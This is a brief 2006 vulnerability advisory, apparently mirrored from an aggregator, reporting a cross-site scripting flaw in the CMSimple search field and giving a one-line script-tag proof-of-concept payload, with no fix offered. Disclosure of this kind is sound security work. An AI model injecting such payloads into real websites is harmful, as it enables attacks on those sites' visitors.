Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13742
HistoryAug 03, 2006 - 12:00 a.m.

CMSimple Cross Site Scripting

2006-08-0300:00:00
vulners.com
9

###############################################################
#Aria-Security.net Advisory #
#Discovered by: OUTLAW #
#< www.Aria-security.net> #
#Gr33t to: A.u.r.a & l2odon & R@1D3N @ DrtRp & Cl0wn #
###############################################################
#Software: CMSimple
#Attack method: Cross Site Scripting
#Original advisory:http://www.aria-security.net/advisory/cmsimple.txt

#Proof of Concept:

Search in: <script>alert(Aria-Security.Net)</script><!–

#----------------------------------------------------------

#Solution

#No Solutions

#----------------------------------------------------------